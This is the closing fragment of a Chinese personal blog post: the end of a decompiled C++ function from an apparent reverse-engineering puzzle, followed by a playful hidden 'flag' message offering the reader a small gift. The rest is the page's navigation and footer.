class="built_in">string</span>::~<span class="built_in">string</span>(v6);</span><br><span class="line">  <span class="built_in">std</span>::allocator&lt;<span class="keyword">char</span>&gt;::~allocator(v7);</span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::~<span class="built_in">string</span>(v4);</span><br><span class="line">  <span class="built_in">std</span>::allocator&lt;<span class="keyword">char</span>&gt;::~allocator(&amp;v5);</span><br><span class="line">  v0 = (<span class="keyword">const</span> <span class="keyword">char</span> *)<span class="built_in">std</span>::<span class="built_in">string</span>::c_str((<span class="built_in">std</span>::<span class="built_in">string</span> *)&amp;input);</span><br><span class="line">  <span class="built_in">strcpy</span>(s, v0);                         <span class="comment">//重组后的字符串赋给s</span></span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">printf</span>(<span class="string">&quot;So, %s\n&quot;</span>, s);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="1.png" alt="img"></p>
<br/>

<br/>

<p><br/><br/></p>
<br/>

<p><br/><br/></p>
<br/>

<br/>

<br/>

<br/>

<br/>

<h1 id="flag-secret"><a href="#flag-secret" class="headerlink" title="flag{_secret_}"></a>flag{_secret_}</h1><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;5.20有人向你表白吗 (´•ω•`) ？</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;没想到你能走到这一步，确实挺出乎我的意料的 (￣▽￣) </p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;为你准备了一份小礼物，凭借 flag{142857} 这串字符串即可向我领取 (*･ω･)</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;对了，学习固然重要，但也要记得早点休息 ^_^</p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/02/17/PWN%E7%AC%94%E8%AE%B0/" rel="prev" title="PWN笔记">
                  <i class="fa fa-chevron-left"></i> PWN笔记
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/03/04/wifi%E7%A0%B4%E8%A7%A3/" rel="next" title="wifi破解">
                  wifi破解 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">xiaoxiaoxy</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
